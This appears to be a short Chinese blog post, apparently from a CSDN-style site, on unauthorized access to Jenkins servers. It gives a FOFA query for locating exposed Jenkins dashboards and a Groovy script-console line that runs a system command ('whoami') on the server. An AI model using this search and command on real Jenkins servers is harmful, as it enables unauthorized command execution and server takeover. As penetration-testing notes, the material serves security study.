Jenkins未授权访问漏洞

lhdbk______2024-08-08 12:59
5.Jenkins未授权访问漏洞

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

一、使用以下fofa语法进行产品搜索
复制代码 
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
二:在打开的URL中.点击 Manage Jenkins-->Scritp Console 在执行以下命令

println "whoami".execute().text

相关推荐
灵感__idea6 小时前
Hello 算法:让前端人真正理解算法
前端·javascript·算法
m0_728033136 小时前
JavaWeb——Servlet生命周期
servlet
向葭奔赴♡6 小时前
CSS是什么?—— 网页的“化妆师”
前端·css
黑犬mo6 小时前
在Edge、Chrome浏览器上安装uBlock Origin插件
前端·edge
excel6 小时前
🧩 Vue 3 watch 源码详解(含完整注释)
前端·javascript·vue.js
大前端helloworld6 小时前
前端梳理体系从常问问题去完善-网络篇
前端·面试
excel6 小时前
🌿 一文看懂 Vue 3 的 watch 源码:从原理到流程
前端
风语者日志7 小时前
CTF攻防世界WEB精选基础入门:command_execution
web安全·网络安全·ctf·小白入门
繁依Fanyi7 小时前
让工具说话:我在 Inspira Board 里用 AI 把“能用、好用、可复用”落成了日常
前端
weixin_456904278 小时前
C# 中的回调函数
java·前端·c#
热门推荐
01BongoCat - 跨平台键盘猫动画工具02智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践03两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答04GitHub 镜像站点052025羊城杯网络安全大赛 wp06UV安装并设置国内源07Linux下V2Ray安装配置指南0846个Nano-banana 精选提示词,持续更新中09Spring Boot 实现微信登录,So Easy !10Cursor Plan Mode:AI 终于知道先想后做了